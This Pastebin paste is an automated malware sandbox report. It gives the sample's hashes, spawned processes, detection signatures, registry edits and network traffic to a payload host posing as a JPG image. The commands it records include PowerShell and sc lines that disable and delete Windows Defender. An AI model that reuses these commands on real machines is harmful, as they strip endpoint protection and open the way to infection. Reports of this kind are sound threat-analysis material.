API tools faq
paste
paladin316

Zips_7001f9ada4c0f5e8e47ac3696f190d31_php_2019-06-26_21_30.json

paladin316
Jun 26th, 2019
1,322
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.24 KB | None | 0 0
raw download clone embed print report
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Zips_7001f9ada4c0f5e8e47ac3696f190d31.php"
  7. [*] File Size: 87059
  8. [*] File Type: "Zip archive data, at least v2.0 to extract"
  9. [*] SHA256: "d547f50711ff9602d75c9f0eb8d8fce09340e899cc8ec74820a28efea1ba232e"
  10. [*] MD5: "7001f9ada4c0f5e8e47ac3696f190d31"
  11. [*] SHA1: "a397ea3a1d0c3e33e849a87d3afff7c2634ee821"
  12. [*] SHA512: "232a9b298a27f0ef2d40308ad6b20fe14c69e10bac6caa345abcee94d53c40fa11310e443e9b682345c3ed46ff2fd1da6387ace1a7207c058fe108685ce3912e"
  13. [*] CRC32: "42382ED5"
  14. [*] SSDEEP: "1536:u12AQGX237sfjwKI5dCMsnzwemn+rPtx8tuEuLQEoF5hHA/JMY2:uwAQB34X6dCVz4+jD8tuEusEoFhY2"
  15.  
  16. [*] Process Execution: [
  17. "wscript.exe",
  18. "dr.exe",
  19. "cmd.exe",
  20. "powershell.exe",
  21. "cmd.exe",
  22. "sc.exe",
  23. "cmd.exe",
  24. "sc.exe",
  25. "cmd.exe",
  26. "sc.exe",
  27. "cmd.exe",
  28. "sc.exe",
  29. "cmd.exe",
  30. "powershell.exe",
  31. "svchost.exe",
  32. "services.exe",
  33. "lsass.exe"
  34. ]
  35.  
  36. [*] Signatures Detected: [
  37. {
  38. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  39. "Details": [
  40. {
  41. "IP": "185.94.230.114:80"
  42. }
  43. ]
  44. },
  45. {
  46. "Description": "Creates RWX memory",
  47. "Details": []
  48. },
  49. {
  50. "Description": "Possible date expiration check, exits too soon after checking local time",
  51. "Details": [
  52. {
  53. "process": "cmd.exe, PID 2844"
  54. }
  55. ]
  56. },
  57. {
  58. "Description": "A process created a hidden window",
  59. "Details": [
  60. {
  61. "Process": "dr.exe -> cmd"
  62. },
  63. {
  64. "Process": "dr.exe -> cmd"
  65. },
  66. {
  67. "Process": "dr.exe -> cmd"
  68. }
  69. ]
  70. },
  71. {
  72. "Description": "Drops a binary and executes it",
  73. "Details": [
  74. {
  75. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe"
  76. }
  77. ]
  78. },
  79. {
  80. "Description": "Performs some HTTP requests",
  81. "Details": [
  82. {
  83. "url": "http://bootiky.com/Dree9238.JPG"
  84. }
  85. ]
  86. },
  87. {
  88. "Description": "Attempts to stop active services",
  89. "Details": [
  90. {
  91. "servicename": "WinDefend"
  92. }
  93. ]
  94. },
  95. {
  96. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  97. "Details": [
  98. {
  99. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 12269276 times"
  100. }
  101. ]
  102. },
  103. {
  104. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
  105. "Details": [
  106. {
  107. "modified_name": "svchost.exe",
  108. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  109. "original_name": "svchost.exe",
  110. "original_path": "C:\\Windows\\system32\\svchost.exe"
  111. }
  112. ]
  113. },
  114. {
  115. "Description": "Creates a hidden or system file",
  116. "Details": [
  117. {
  118. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1177b3d.TMP"
  119. }
  120. ]
  121. },
  122. {
  123. "Description": "Attempts to disable Windows Defender",
  124. "Details": []
  125. }
  126. ]
  127.  
  128. [*] Started Service: [
  129. "KeyIso"
  130. ]
  131.  
  132. [*] Executed Commands: [
  133. "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  134. "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  135. "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  136. "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
  137. "cmd /c sc stop WinDefend",
  138. "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
  139. "cmd /c sc delete WinDefend",
  140. "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
  141. "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
  142. "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  143. "C:\\Windows\\system32\\svchost.exe",
  144. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  145. "sc stop WinDefend",
  146. "sc delete WinDefend",
  147. "C:\\Windows\\system32\\lsass.exe"
  148. ]
  149.  
  150. [*] Mutexes: [
  151. "Local\\ZoneAttributeCacheCounterMutex",
  152. "Local\\ZonesCacheCounterMutex",
  153. "Local\\ZonesLockedCacheCounterMutex",
  154. "Global\\CLR_CASOFF_MUTEX",
  155. "Global\\838B6C9EB27932960"
  156. ]
  157.  
  158. [*] Modified Files: [
  159. "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  160. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  162. "\\??\\PIPE\\srvsvc",
  163. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ZGSK3B76JGB4GHOI3R9H.temp",
  164. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1177b3d.TMP",
  165. "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  166. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ODR9CMABFFET44BNUZ9Q.temp",
  167. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms"
  168. ]
  169.  
  170. [*] Deleted Files: [
  171. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1177b3d.TMP",
  172. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1548.18328859",
  173. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1548.18328859",
  174. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1548.18328859",
  175. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ODR9CMABFFET44BNUZ9Q.temp",
  176. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2260.18349640",
  177. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2260.18349640",
  178. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2260.18349656"
  179. ]
  180.  
  181. [*] Modified Registry Keys: [
  182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  184. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
  185. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  186. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  187. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
  188. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
  189. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
  190. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
  191. "DisableNotifications",
  192. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList"
  193. ]
  194.  
  195. [*] Deleted Registry Keys: [
  196. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  197. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  198. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  199. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  200. ]
  201.  
  202. [*] DNS Communications: [
  203. {
  204. "type": "A",
  205. "request": "bootiky.com",
  206. "answers": [
  207. {
  208. "data": "185.94.230.114",
  209. "type": "A"
  210. }
  211. ]
  212. }
  213. ]
  214.  
  215. [*] Domains: [
  216. {
  217. "ip": "185.94.230.114",
  218. "domain": "bootiky.com"
  219. }
  220. ]
  221.  
  222. [*] Network Communication - ICMP: []
  223.  
  224. [*] Network Communication - HTTP: [
  225. {
  226. "count": 1,
  227. "body": "",
  228. "uri": "http://bootiky.com/Dree9238.JPG",
  229. "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
  230. "method": "GET",
  231. "host": "bootiky.com",
  232. "version": "1.1",
  233. "path": "/Dree9238.JPG",
  234. "data": "GET /Dree9238.JPG HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: bootiky.com\r\n\r\n",
  235. "port": 80
  236. }
  237. ]
  238.  
  239. [*] Network Communication - SMTP: []
  240.  
  241. [*] Network Communication - Hosts: []
  242.  
  243. [*] Network Communication - IRC: []
  244.  
  245. [*] Static Analysis: {
  246. "office": {
  247. "Metadata": {
  248. "HasMacros": "No"
  249. }
  250. }
  251. }
  252.  
  253. [*] Resolved APIs: [
  254. "advapi32.dll.SaferIdentifyLevel",
  255. "advapi32.dll.SaferComputeTokenFromLevel",
  256. "advapi32.dll.SaferCloseLevel",
  257. "ole32.dll.CLSIDFromProgIDEx",
  258. "ole32.dll.CoGetClassObject",
  259. "wscript.exe.#1",
  260. "urlmon.dll.#326",
  261. "urlmon.dll.#327",
  262. "shell32.dll.#685",
  263. "shell32.dll.#688",
  264. "urlmon.dll.#395",
  265. "cryptsp.dll.CryptAcquireContextW",
  266. "cryptsp.dll.CryptGenRandom",
  267. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  268. "winhttp.dll.WinHttpCheckPlatform",
  269. "winhttp.dll.WinHttpOpen",
  270. "winhttp.dll.WinHttpConnect",
  271. "winhttp.dll.WinHttpOpenRequest",
  272. "winhttp.dll.WinHttpCloseHandle",
  273. "winhttp.dll.WinHttpSendRequest",
  274. "winhttp.dll.WinHttpReceiveResponse",
  275. "winhttp.dll.WinHttpAddRequestHeaders",
  276. "winhttp.dll.WinHttpQueryHeaders",
  277. "winhttp.dll.WinHttpReadData",
  278. "winhttp.dll.WinHttpWriteData",
  279. "winhttp.dll.WinHttpQueryDataAvailable",
  280. "winhttp.dll.WinHttpQueryOption",
  281. "winhttp.dll.WinHttpSetOption",
  282. "winhttp.dll.WinHttpSetTimeouts",
  283. "winhttp.dll.WinHttpCrackUrl",
  284. "winhttp.dll.WinHttpCreateUrl",
  285. "oleaut32.dll.#8",
  286. "oleaut32.dll.#12",
  287. "shlwapi.dll.StrRChrA",
  288. "shlwapi.dll.StrCmpNW",
  289. "oleaut32.dll.#4",
  290. "oleaut32.dll.#6",
  291. "kernel32.dll.RegQueryValueExW",
  292. "oleaut32.dll.#2",
  293. "kernel32.dll.RegCloseKey",
  294. "oleaut32.dll.#9",
  295. "ws2_32.dll.GetAddrInfoW",
  296. "ws2_32.dll.WSASocketW",
  297. "ws2_32.dll.#2",
  298. "ws2_32.dll.#21",
  299. "ws2_32.dll.#9",
  300. "ws2_32.dll.WSAIoctl",
  301. "ws2_32.dll.FreeAddrInfoW",
  302. "ws2_32.dll.#6",
  303. "ws2_32.dll.#5",
  304. "ws2_32.dll.WSARecv",
  305. "ws2_32.dll.WSASend",
  306. "ole32.dll.CreateStreamOnHGlobal",
  307. "oleaut32.dll.#411",
  308. "oleaut32.dll.#23",
  309. "oleaut32.dll.#24",
  310. "ole32.dll.GetHGlobalFromStream",
  311. "rpcrt4.dll.RpcBindingFree",
  312. "oleaut32.dll.#500",
  313. "cryptsp.dll.CryptReleaseContext",
  314. "cryptsp.dll.CryptAcquireContextA",
  315. "kernel32.dll.VirtualAlloc",
  316. "ntdll.dll.memcpy",
  317. "kernel32.dll.GetCurrentProcess",
  318. "kernel32.dll.CloseHandle",
  319. "advapi32.dll.OpenProcessToken",
  320. "advapi32.dll.GetTokenInformation",
  321. "kernel32.dll.Wow64EnableWow64FsRedirection",
  322. "advapi32.dll.RegCloseKey",
  323. "advapi32.dll.RegCreateKeyW",
  324. "advapi32.dll.RegOpenKeyExW",
  325. "advapi32.dll.RegSetValueExW",
  326. "shell32.dll.ShellExecuteA",
  327. "ole32.dll.OleInitialize",
  328. "cryptbase.dll.SystemFunction036",
  329. "ole32.dll.CreateBindCtx",
  330. "ole32.dll.CoTaskMemAlloc",
  331. "propsys.dll.PSCreateMemoryPropertyStore",
  332. "propsys.dll.PSPropertyBag_WriteDWORD",
  333. "ole32.dll.CoGetApartmentType",
  334. "ole32.dll.CoRegisterInitializeSpy",
  335. "ole32.dll.CoTaskMemFree",
  336. "comctl32.dll.#236",
  337. "ole32.dll.CoGetMalloc",
  338. "propsys.dll.PSPropertyBag_ReadDWORD",
  339. "propsys.dll.PSPropertyBag_ReadGUID",
  340. "comctl32.dll.#320",
  341. "comctl32.dll.#324",
  342. "comctl32.dll.#323",
  343. "advapi32.dll.RegEnumKeyW",
  344. "advapi32.dll.OpenThreadToken",
  345. "ole32.dll.StringFromGUID2",
  346. "apphelp.dll.ApphelpCheckShellObject",
  347. "ole32.dll.CoCreateInstance",
  348. "urlmon.dll.CreateUri",
  349. "kernel32.dll.InitializeSRWLock",
  350. "kernel32.dll.AcquireSRWLockExclusive",
  351. "kernel32.dll.AcquireSRWLockShared",
  352. "kernel32.dll.ReleaseSRWLockExclusive",
  353. "kernel32.dll.ReleaseSRWLockShared",
  354. "comctl32.dll.#328",
  355. "comctl32.dll.#334",
  356. "shell32.dll.#102",
  357. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  358. "propsys.dll.PSPropertyBag_ReadStrAlloc",
  359. "ole32.dll.CoInitializeEx",
  360. "advapi32.dll.InitializeSecurityDescriptor",
  361. "advapi32.dll.SetEntriesInAclW",
  362. "ntmarta.dll.GetMartaExtensionInterface",
  363. "advapi32.dll.SetSecurityDescriptorDacl",
  364. "advapi32.dll.IsTextUnicode",
  365. "comctl32.dll.#332",
  366. "comctl32.dll.#338",
  367. "comctl32.dll.#339",
  368. "ole32.dll.CoUninitialize",
  369. "sechost.dll.ConvertSidToStringSidW",
  370. "profapi.dll.#104",
  371. "propsys.dll.#430",
  372. "advapi32.dll.RegGetValueW",
  373. "ole32.dll.CoTaskMemRealloc",
  374. "propsys.dll.InitPropVariantFromStringAsVector",
  375. "propsys.dll.PSCoerceToCanonicalValue",
  376. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  377. "propsys.dll.PropVariantToStringAlloc",
  378. "ole32.dll.PropVariantClear",
  379. "ole32.dll.CoAllowSetForegroundWindow",
  380. "comctl32.dll.#386",
  381. "shell32.dll.SHGetFolderPathW",
  382. "advapi32.dll.SaferGetPolicyInformation",
  383. "ntdll.dll.RtlDllShutdownInProgress",
  384. "comctl32.dll.#329",
  385. "ole32.dll.OleUninitialize",
  386. "ole32.dll.CoRevokeInitializeSpy",
  387. "comctl32.dll.#388",
  388. "advapi32.dll.CryptAcquireContextA",
  389. "advapi32.dll.CryptImportKey",
  390. "advapi32.dll.CryptEncrypt",
  391. "cryptsp.dll.CryptImportKey",
  392. "cryptbase.dll.SystemFunction040",
  393. "cryptbase.dll.SystemFunction041",
  394. "cryptsp.dll.CryptEncrypt",
  395. "advapi32.dll.UnregisterTraceGuids",
  396. "comctl32.dll.#321",
  397. "kernel32.dll.SetThreadUILanguage",
  398. "kernel32.dll.CopyFileExW",
  399. "kernel32.dll.IsDebuggerPresent",
  400. "kernel32.dll.SetConsoleInputExeNameW",
  401. "kernel32.dll.SortGetHandle",
  402. "kernel32.dll.SortCloseHandle",
  403. "uxtheme.dll.ThemeInitApiHook",
  404. "user32.dll.IsProcessDPIAware",
  405. "shell32.dll.#66",
  406. "comctl32.dll.#385",
  407. "comctl32.dll.#336",
  408. "comctl32.dll.#333",
  409. "linkinfo.dll.IsValidLinkInfo",
  410. "propsys.dll.#417",
  411. "propsys.dll.PSGetNameFromPropertyKey",
  412. "propsys.dll.PSStringFromPropertyKey",
  413. "propsys.dll.InitVariantFromBuffer",
  414. "propsys.dll.PropVariantToGUID",
  415. "linkinfo.dll.CreateLinkInfoW",
  416. "user32.dll.IsCharAlphaW",
  417. "user32.dll.CharPrevW",
  418. "ntshrui.dll.GetNetResourceFromLocalPathW",
  419. "srvcli.dll.NetShareEnum",
  420. "cscapi.dll.CscNetApiGetInterface",
  421. "slc.dll.SLGetWindowsInformationDWORD",
  422. "shlwapi.dll.PathRemoveFileSpecW",
  423. "linkinfo.dll.DestroyLinkInfo",
  424. "propsys.dll.PropVariantToBoolean",
  425. "advapi32.dll.GetSecurityInfo",
  426. "advapi32.dll.SetSecurityInfo",
  427. "advapi32.dll.GetSecurityDescriptorControl",
  428. "advapi32.dll.RegQueryInfoKeyW",
  429. "advapi32.dll.RegEnumKeyExW",
  430. "advapi32.dll.RegEnumValueW",
  431. "advapi32.dll.RegQueryValueExW",
  432. "shlwapi.dll.UrlIsW",
  433. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  434. "msvcrt.dll._set_error_mode",
  435. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
  436. "kernel32.dll.FindActCtxSectionStringW",
  437. "kernel32.dll.GetSystemWindowsDirectoryW",
  438. "mscoree.dll.GetProcessExecutableHeap",
  439. "mscorwks.dll.DllGetClassObjectInternal",
  440. "mscorwks.dll.GetCLRFunction",
  441. "advapi32.dll.RegisterTraceGuidsW",
  442. "advapi32.dll.GetTraceLoggerHandle",
  443. "advapi32.dll.GetTraceEnableLevel",
  444. "advapi32.dll.GetTraceEnableFlags",
  445. "advapi32.dll.TraceEvent",
  446. "mscoree.dll.IEE",
  447. "mscorwks.dll.IEE",
  448. "mscoree.dll.GetStartupFlags",
  449. "mscoree.dll.GetHostConfigurationFile",
  450. "mscoree.dll.GetCORSystemDirectory",
  451. "ntdll.dll.RtlVirtualUnwind",
  452. "kernel32.dll.IsWow64Process",
  453. "advapi32.dll.AllocateAndInitializeSid",
  454. "advapi32.dll.InitializeAcl",
  455. "advapi32.dll.AddAccessAllowedAce",
  456. "advapi32.dll.FreeSid",
  457. "kernel32.dll.SetThreadStackGuarantee",
  458. "kernel32.dll.FlsSetValue",
  459. "kernel32.dll.FlsGetValue",
  460. "kernel32.dll.FlsAlloc",
  461. "kernel32.dll.FlsFree",
  462. "kernel32.dll.AddVectoredContinueHandler",
  463. "kernel32.dll.RemoveVectoredContinueHandler",
  464. "advapi32.dll.ConvertSidToStringSidW",
  465. "kernel32.dll.FlushProcessWriteBuffers",
  466. "kernel32.dll.GetWriteWatch",
  467. "kernel32.dll.ResetWriteWatch",
  468. "kernel32.dll.CreateMemoryResourceNotification",
  469. "kernel32.dll.QueryMemoryResourceNotification",
  470. "kernel32.dll.GlobalMemoryStatusEx",
  471. "ole32.dll.CoGetContextToken",
  472. "oleaut32.dll.#149",
  473. "kernel32.dll.GetUserDefaultUILanguage",
  474. "kernel32.dll.GetVersionExW",
  475. "kernel32.dll.GetFullPathNameW",
  476. "kernel32.dll.SetErrorMode",
  477. "kernel32.dll.GetFileAttributesExW",
  478. "version.dll.GetFileVersionInfoSizeW",
  479. "version.dll.GetFileVersionInfoW",
  480. "version.dll.VerQueryValueW",
  481. "kernel32.dll.lstrlen",
  482. "kernel32.dll.lstrlenW",
  483. "mscoree.dll.ND_RI2",
  484. "kernel32.dll.lstrcpy",
  485. "kernel32.dll.lstrcpyW",
  486. "version.dll.VerLanguageNameW",
  487. "kernel32.dll.GetCurrentProcessId",
  488. "advapi32.dll.LookupPrivilegeValueW",
  489. "advapi32.dll.AdjustTokenPrivileges",
  490. "kernel32.dll.OpenProcess",
  491. "psapi.dll.EnumProcessModules",
  492. "psapi.dll.GetModuleInformation",
  493. "psapi.dll.GetModuleBaseNameW",
  494. "psapi.dll.GetModuleFileNameExW",
  495. "kernel32.dll.GetExitCodeProcess",
  496. "ntdll.dll.NtQuerySystemInformation",
  497. "user32.dll.EnumWindows",
  498. "user32.dll.GetWindowThreadProcessId",
  499. "kernel32.dll.WerSetFlags",
  500. "kernel32.dll.SetThreadPreferredUILanguages",
  501. "kernel32.dll.GetThreadPreferredUILanguages",
  502. "kernel32.dll.GetUserDefaultLocaleName",
  503. "kernel32.dll.GetEnvironmentVariableW",
  504. "advapi32.dll.CryptReleaseContext",
  505. "advapi32.dll.CryptCreateHash",
  506. "advapi32.dll.CryptDestroyHash",
  507. "advapi32.dll.CryptHashData",
  508. "advapi32.dll.CryptGetHashParam",
  509. "advapi32.dll.CryptExportKey",
  510. "advapi32.dll.CryptGenKey",
  511. "advapi32.dll.CryptGetKeyParam",
  512. "advapi32.dll.CryptDestroyKey",
  513. "advapi32.dll.CryptVerifySignatureA",
  514. "advapi32.dll.CryptSignHashA",
  515. "advapi32.dll.CryptGetProvParam",
  516. "advapi32.dll.CryptGetUserKey",
  517. "advapi32.dll.CryptEnumProvidersA",
  518. "cryptsp.dll.CryptHashData",
  519. "cryptsp.dll.CryptGetHashParam",
  520. "cryptsp.dll.CryptDestroyHash",
  521. "cryptsp.dll.CryptDestroyKey",
  522. "mscoree.dll.GetTokenForVTableEntry",
  523. "mscoree.dll.SetTargetForVTableEntry",
  524. "mscoree.dll.GetTargetForVTableEntry",
  525. "culture.dll.ConvertLangIdToCultureName",
  526. "ole32.dll.CoCreateGuid",
  527. "kernel32.dll.CreateFileW",
  528. "kernel32.dll.GetConsoleScreenBufferInfo",
  529. "kernel32.dll.LocalFree",
  530. "kernel32.dll.LocalAlloc",
  531. "mscoree.dll.ND_RI4",
  532. "advapi32.dll.DuplicateTokenEx",
  533. "advapi32.dll.CheckTokenMembership",
  534. "kernel32.dll.GetConsoleTitleW",
  535. "mscorjit.dll.getJit",
  536. "kernel32.dll.SetConsoleTitleW",
  537. "kernel32.dll.SetConsoleCtrlHandler",
  538. "kernel32.dll.CreateEventW",
  539. "ntdll.dll.WinSqmIsOptedIn",
  540. "kernel32.dll.ExpandEnvironmentStringsW",
  541. "shfolder.dll.SHGetFolderPathW",
  542. "kernel32.dll.SetEnvironmentVariableW",
  543. "kernel32.dll.GetACP",
  544. "kernel32.dll.UnmapViewOfFile",
  545. "kernel32.dll.GetFileType",
  546. "kernel32.dll.ReadFile",
  547. "kernel32.dll.GetSystemInfo",
  548. "kernel32.dll.VirtualQuery",
  549. "secur32.dll.GetUserNameExW",
  550. "advapi32.dll.GetUserNameW",
  551. "kernel32.dll.ReleaseMutex",
  552. "advapi32.dll.RegisterEventSourceW",
  553. "advapi32.dll.DeregisterEventSource",
  554. "advapi32.dll.ReportEventW",
  555. "kernel32.dll.GetLogicalDrives",
  556. "kernel32.dll.GetDriveTypeW",
  557. "kernel32.dll.GetVolumeInformationW",
  558. "kernel32.dll.GetCurrentDirectoryW",
  559. "kernel32.dll.GetLastError",
  560. "kernel32.dll.GetStdHandle",
  561. "kernel32.dll.GetConsoleMode",
  562. "kernel32.dll.SetEvent",
  563. "kernel32.dll.FindFirstFileW",
  564. "kernel32.dll.FindClose",
  565. "mscoree.dll.DllGetClassObject",
  566. "diasymreader.dll.DllGetClassObjectInternal",
  567. "kernel32.dll.GetConsoleOutputCP",
  568. "gdi32.dll.TranslateCharsetInfo",
  569. "kernel32.dll.SetConsoleTextAttribute",
  570. "kernel32.dll.WriteConsoleW",
  571. "mscoree.dll.CorExitProcess",
  572. "mscorwks.dll.CorExitProcess",
  573. "mscorwks.dll._CorDllMain",
  574. "kernel32.dll.CreateActCtxW",
  575. "kernel32.dll.AddRefActCtx",
  576. "kernel32.dll.ReleaseActCtx",
  577. "kernel32.dll.ActivateActCtx",
  578. "kernel32.dll.DeactivateActCtx",
  579. "kernel32.dll.GetCurrentActCtx",
  580. "kernel32.dll.QueryActCtxW",
  581. "netutils.dll.NetApiBufferFree",
  582. "kernel32.dll.IsProcessorFeaturePresent",
  583. "ntdll.dll.RtlUnwind",
  584. "mscoree.dll._CorExeMain",
  585. "mscoree.dll._CorImageUnloading",
  586. "mscoree.dll._CorValidateImage",
  587. "cryptsp.dll.CryptExportKey",
  588. "cryptsp.dll.CryptCreateHash",
  589. "kernel32.dll.SwitchToThread",
  590. "rpcrt4.dll.UuidFromStringW",
  591. "rpcrt4.dll.RpcBindingCreateW",
  592. "rpcrt4.dll.RpcBindingBind",
  593. "sechost.dll.OpenSCManagerW",
  594. "sechost.dll.OpenServiceW",
  595. "sechost.dll.StartServiceW",
  596. "sechost.dll.CloseServiceHandle"
  597. ]
  598.  
  599. [*] Static Analysis: {
  600. "office": {
  601. "Metadata": {
  602. "HasMacros": "No"
  603. }
  604. }
  605. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!